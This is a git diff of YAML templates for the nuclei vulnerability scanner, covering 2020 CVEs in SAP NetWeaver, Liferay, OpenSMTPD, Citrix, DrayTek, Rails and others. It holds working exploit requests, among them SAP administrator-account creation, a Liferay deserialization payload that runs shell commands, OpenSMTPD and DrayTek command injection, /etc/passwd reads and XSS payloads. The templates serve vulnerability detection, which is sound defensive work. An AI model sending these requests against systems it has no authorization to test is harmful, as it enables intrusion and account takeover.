https://github.com/Ibonok/CVE-2020-4463 + tags: cve,cve2020,ibm,xxe,disclosure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L + cvss-score: 8.20 + cve-id: CVE-2020-4463 + cwe-id: CWE-611 + +requests: + - method: POST + path: + - "{{BaseURL}}/os/mxperson" + - "{{BaseURL}}/meaweb/os/mxperson" + body: | + <?xml version='1.0' encoding='UTF-8'?> + <max:QueryMXPERSON xmlns:max='http://www.ibm.com/maximo'> + <max:MXPERSONQuery></max:MXPERSONQuery> + </max:QueryMXPERSON> + headers: + Content-Type: application/xml + matchers-condition: and + matchers: + - type: word + words: + - "application/xml" + part: header + - type: word + words: + - "QueryMXPERSONResponse" + - "MXPERSONSet" + part: body diff --git a/nuclei-templates/CVE-2020/cve-2020-5284.yaml b/nuclei-templates/CVE-2020/cve-2020-5284.yaml deleted file mode 100644 index 97a56c996e..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-5284.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2020-5284 - -info: - name: Next.js .next/ limited path traversal - author: rootxharsh,iamnoooob,dwisiswant0 - severity: medium - description: Next.js versions before 9.3.2 have a directory traversal vulnerability. Attackers could craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory. This issue is fixed in version 9.3.2. - tags: cve,cve2020,nextjs,lfi - reference: - https://github.com/zeit/next.js/releases/tag/v9.3.2 - https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N - cvss-score: 4.30 - cve-id: CVE-2020-5284 - cwe-id: CWE-22 - -requests: - - method: GET - path: - - "{{BaseURL}}/_next/static/../server/pages-manifest.json" - matchers-condition: and - matchers: - - type: regex - regex: - - '\{"/_app":".*?_app\.js"' - part: body - - type: word - words: - - "application/json" - part: header - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-5847.yaml b/nuclei-templates/CVE-2020/cve-2020-5847.yaml new file mode 100644 index 0000000000..176b2b2136 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-5847.yaml @@ -0,0 +1,29 @@ +id: CVE-2020-5847 +info: + name: UnRaid Remote Code Execution + author: madrobot + severity: critical + description: A vulnerability in UnRaid allows remote unauthenticated attackers to execute arbitrary code. + reference: https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/ + tags: cve,cve2020,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-5847 + cwe-id: CWE-94,CWE-668 + +requests: + - method: GET + path: + - "{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "PHP Extension" + - "PHP Version" + condition: and diff --git a/nuclei-templates/CVE-2020/cve-2020-6287.yaml b/nuclei-templates/CVE-2020/cve-2020-6287.yaml deleted file mode 100644 index d86e3db289..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-6287.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: CVE-2020-6287 - -info: - name: SAP NetWeaver - Remote Admin addition - author: dwisiswant0 - severity: critical - tags: cve,cve2020,sap - description: | - SAP NetWeaver AS JAVA (LM Configuration Wizard), versions - 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system, leading to Missing Authentication Check. - reference: - - https://launchpad.support.sap.com/#/notes/2934135 - - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675 - - https://www.onapsis.com/recon-sap-cyber-security-vulnerability - - https://github.com/chipik/SAP_RECON - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.00 - cve-id: CVE-2020-6287 - cwe-id: CWE-306 - -requests: - - raw: - - | - POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml; charset=UTF-8 - Connection: close - - <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData> - CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA== - </baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope> - - # userName - sapRpoc6351 - # password - Secure!PwD8890 - - matchers-condition: and - matchers: - - type: word - words: - - "CTCWebServiceSi" - - "SOAP-ENV" - part: body - condition: and - - - type: status - status: - - 200 - - - type: word - words: - - "text/xml" - - "SAP NetWeaver Application Server" - part: header diff --git a/nuclei-templates/CVE-2020/cve-2020-6308.yaml b/nuclei-templates/CVE-2020/cve-2020-6308.yaml new file mode 100644 index 0000000000..4dc92d511d --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-6308.yaml @@ -0,0 +1,27 @@ +id: CVE-2020-6308 + +info: + name: Unauthenticated Blind SSRF in SAP + author: madrobot + severity: medium + reference: https://github.com/InitRoot/CVE-2020-6308-PoC + tags: cve,cve2020,sap,ssrf,oast,blind + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-6308 + cwe-id: CWE-918 + description: "SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability." + +requests: + - method: POST + path: + - '{{BaseURL}}/AdminTools/querybuilder/logon?framework=' + + body: aps={{interactsh-url}}&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp + + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" diff --git a/nuclei-templates/CVE-2020/cve-2020-7136.yaml b/nuclei-templates/CVE-2020/cve-2020-7136.yaml new file mode 100644 index 0000000000..ec212016bf --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-7136.yaml @@ -0,0 +1,49 @@ +id: CVE-2020-7136 + +info: + name: HPE Smart Update Manager - Remote Unauthorized Access + author: gy741 + severity: critical + description: A security vulnerability in HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP). + reference: + - https://www.tenable.com/security/research/tra-2020-02 + - https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=emr_na-hpesbmu03997en_us + - https://nvd.nist.gov/vuln/detail/CVE-2020-7136 + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-7136 + cwe-id: CWE-288 + tags: cve,cve2020,hp,auth-bypass,hpe + +requests: + - raw: + - | + POST /session/create HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/json + + {"hapi":{"username":"Administrator","password":"any_password","language":"en","mode":"gui", "usesshkey":true, "privatekey":"any_privateky", "passphrase":"any_passphase","settings":{"output_filter":"passed","port_number":"444"}}} + + - | + GET /session/{{sessionid}}/node/index HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + part: body + words: + - "hmessage" + - "Command completed successfully." + - "node_name" + condition: and + + extractors: + - type: regex + name: sessionid + group: 1 + internal: true + part: body + regex: + - '"sessionId":"([a-z0-9.]+)"' diff --git a/nuclei-templates/CVE-2020/cve-2020-7247.yaml b/nuclei-templates/CVE-2020/cve-2020-7247.yaml new file mode 100644 index 0000000000..f04736b5ce --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-7247.yaml @@ -0,0 +1,44 @@ +id: CVE-2020-7247 +info: + name: OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution + author: princechaddha + severity: critical + reference: https://www.openwall.com/lists/oss-security/2020/01/28/3 + tags: cve,cve2020,smtp,opensmtpd,network,rce,oast + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-7247 + cwe-id: CWE-78,CWE-755 + description: "smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation." + +network: + - inputs: + - read: 1024 + - data: "helo target\r\n" + read: 1024 + - data: "MAIL FROM:<;nslookup {{interactsh-url}};>\r\n" + read: 1024 + - data: "RCPT TO:<root>\r\n" + read: 1024 + - data: "DATA\r\n" + read: 1024 + - data: "\r\nxxxx\r\n.\r\n" + read: 1024 + - data: "QUIT\r\n" + read: 1024 + host: + - "{{Hostname}}" + - "{{Host}}:25" + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: raw + words: + - "Message accepted for delivery" \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-7318.yaml b/nuclei-templates/CVE-2020/cve-2020-7318.yaml deleted file mode 100644 index 5d994c8781..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-7318.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2020-7318 - -info: - name: McAfee ePolicy Orchestrator Reflected XSS - author: dwisiswant0 - severity: medium - description: | - Cross-Site Scripting vulnerability in McAfee ePolicy Orchestrator (ePO) - prior to 5.10.9 Update 9 allows administrators to inject arbitrary web - script or HTML via multiple parameters where the administrator's entries - were not correctly sanitized. - - reference: - - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/ - tags: cve,cve2020,xss,mcafee - classification: - cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.30 - cve-id: CVE-2020-7318 - cwe-id: CWE-79 - -requests: - - raw: - - | - GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1 - Host: {{Hostname}} - Connection: close - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "text/html" - part: header - - type: word - words: - - "Policy Name" - - "'\"><svg/onload=alert(document.domain)>" - condition: and - part: body diff --git a/nuclei-templates/CVE-2020/cve-2020-7961.yaml b/nuclei-templates/CVE-2020/cve-2020-7961.yaml new file mode 100644 index 0000000000..80017aa104 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-7961.yaml @@ -0,0 +1,53 @@ +id: CVE-2020-7961 + +info: + name: Liferay Portal Unauthenticated RCE + author: dwisiswant0 + severity: critical + tags: cve,cve2020,rce,liferay + description: Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS). + reference: + - https://www.synacktiv.com/en/publications/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html + - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html + - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-7961 + cwe-id: CWE-502 + +requests: + - raw: + - | + POST /api/jsonws/invoke HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData + cmd2: §command§ + + cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D + + payloads: + command: + - "systeminfo" # Windows + - "lsb_release -a" # Linux + + matchers-condition: and + matchers: + + - type: regex + condition: or + regex: + - "OS Name:.*Microsoft Windows" + - "Distributor ID:" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - "Microsoft Windows (.*)" + - "Distributor ID: (.*)" diff --git a/nuclei-templates/CVE-2020/cve-2020-8115.yaml b/nuclei-templates/CVE-2020/cve-2020-8115.yaml new file mode 100644 index 0000000000..f38b0a3567 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-8115.yaml @@ -0,0 +1,31 @@ +id: CVE-2020-8115 + +info: + name: Revive Adserver XSS + author: madrobot,dwisiswant0 + severity: medium + description: | + A reflected XSS vulnerability has been discovered in the publicly accessible afr.php delivery script of Revive Adserver <= 5.0.3 by Jacopo Tediosi. There are currently no known exploits: the session identifier cannot be accessed as it is stored in an http-only cookie as of v3.2.2. On older versions, however, under specific circumstances, it could be possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script was printed back without proper escaping in a JavaScript context, allowing an attacker to execute arbitrary JS code on the browser of the victim. + reference: + - https://hackerone.com/reports/775693 + - https://www.revive-adserver.com/security/revive-sa-2020-001/ + tags: cve,cve2020,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-8115 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\"" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + part: body + regex: + - (?mi)window\.location\.replace\(".*alert\(1337\) \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-8163.yaml b/nuclei-templates/CVE-2020/cve-2020-8163.yaml deleted file mode 100644 index b638675ca1..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-8163.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2020-8163 - -info: - name: Potential Remote Code Execution on Rails - author: tim_koopmans - severity: high - description: Tests for ability to pass user parameters as local variables into partials - reference: https://correkt.horse/ruby/2020/08/22/CVE-2020-8163/ - tags: cve,cve2020,rails,rce - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 - cve-id: CVE-2020-8163 - cwe-id: CWE-94 - -requests: - - method: GET - path: - - "{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" - part: body diff --git a/nuclei-templates/CVE-2020/cve-2020-8191.yaml b/nuclei-templates/CVE-2020/cve-2020-8191.yaml new file mode 100644 index 0000000000..850e1e43ea --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-8191.yaml @@ -0,0 +1,41 @@ +id: CVE-2020-8191 + +info: + name: Citrix ADC & NetScaler Gateway Reflected XSS + author: dwisiswant0 + severity: medium + tags: cve,cve2020,citrix,xss + reference: https://support.citrix.com/article/CTX276688 + description: | + Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows reflected Cross Site Scripting (XSS). + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-8191 + cwe-id: CWE-79 + +requests: + - raw: + - | + POST /menu/stapp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + X-NITRO-USER: xpyZxwy6 + + sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: status + status: + - 200 + + - type: word + words: + - "text/html" + part: header \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-8193.yaml b/nuclei-templates/CVE-2020/cve-2020-8193.yaml deleted file mode 100644 index 286402bddc..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-8193.yaml +++ /dev/null @@ -1,74 +0,0 @@ -id: CVE-2020-8193 - -info: - name: Citrix unauthenticated LFI - author: pdteam - severity: medium - reference: - - https://github.com/jas502n/CVE-2020-8193 - - http://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html - description: Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints. - tags: cve,cve2020,citrix,lfi - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N - cvss-score: 6.50 - cve-id: CVE-2020-8193 - cwe-id: CWE-862 - -requests: - - raw: - - | - POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/xml - X-NITRO-USER: xpyZxwy6 - X-NITRO-PASS: xWXHUJ56 - - - - - | - GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1 - Host: {{Hostname}} - - - | - GET /menu/neo HTTP/1.1 - Host: {{Hostname}} - - - | - GET /menu/stc HTTP/1.1 - Host: {{Hostname}} - - - | - POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/xml - X-NITRO-USER: oY39DXzQ - X-NITRO-PASS: ZuU9Y9c1 - rand_key: §randkey§ - - - - - | - POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/xml - X-NITRO-USER: oY39DXzQ - X-NITRO-PASS: ZuU9Y9c1 - rand_key: §randkey§ - - - - cookie-reuse: true - extractors: - - type: regex - name: randkey # dynamic variable - part: body - internal: true - regex: - - "(?m)[0-9]{3,10}\\.[0-9]+" - - matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-8515.yaml b/nuclei-templates/CVE-2020/cve-2020-8515.yaml new file mode 100644 index 0000000000..05ec699777 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-8515.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-8515 + +info: + name: DrayTek pre-auth RCE + author: pikpikcu + severity: critical + description: DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1. + reference: + - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515) + - https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/ + tags: cve,cve2020,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-8515 + cwe-id: CWE-78 + +requests: + - raw: + - | + POST /cgi-bin/mainfunction.cgi HTTP/1.1 + Host: {{Hostname}} + + action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-8641.yaml b/nuclei-templates/CVE-2020/cve-2020-8641.yaml new file mode 100644 index 0000000000..2224f1fcb7 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-8641.yaml @@ -0,0 +1,32 @@ +id: CVE-2020-8641 + +info: + name: Lotus Core CMS 1.0.1 - Local File Inclusion + author: 0x_Akoko + severity: high + tags: cve,cve2020,lfi,lotus + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-8641 + - https://cxsecurity.com/issue/WLB-2020010234 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-8641 + cwe-id: CWE-22 + description: "Lotus Core CMS 1.0.1 allows authenticated Local File Inclusion of .php files via directory traversal in the index.php page_slug parameter." + +requests: + - method: GET + path: + - '{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00' + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-8644.yaml b/nuclei-templates/CVE-2020/cve-2020-8644.yaml new file mode 100644 index 0000000000..aae9417521 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-8644.yaml @@ -0,0 +1,68 @@ +id: CVE-2020-8644 + +info: + name: playSMS <1.4.3 